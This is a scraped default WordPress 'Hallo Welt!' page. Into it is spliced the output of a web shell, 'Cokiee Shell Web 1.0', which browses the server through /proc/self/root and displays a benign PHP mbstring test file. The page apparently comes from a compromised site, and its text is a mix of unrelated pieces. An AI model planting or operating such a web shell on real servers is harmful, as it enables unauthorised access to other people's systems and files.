Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/mbstring/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/mbstring/tests/bug28220.phpt |
--TEST-- Bug #28220 (mb_strwidth() returns wrong width values for some Hangul characters) --SKIPIF-- <?php extension_loaded('mbstring') or die('skip mbstring not available'); ?> --FILE-- <?php $coderange = array( range(0x0000, 0x1fff), range(0xff60, 0xff9f) ); foreach ($coderange as $r) { $ng = 0; foreach ($r as $c) { if (mb_strwidth(pack('N1', $c), 'UCS-4BE') != 2) { $ng++; } } echo "$ng\n"; } ?> --EXPECT-- 8085 63
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare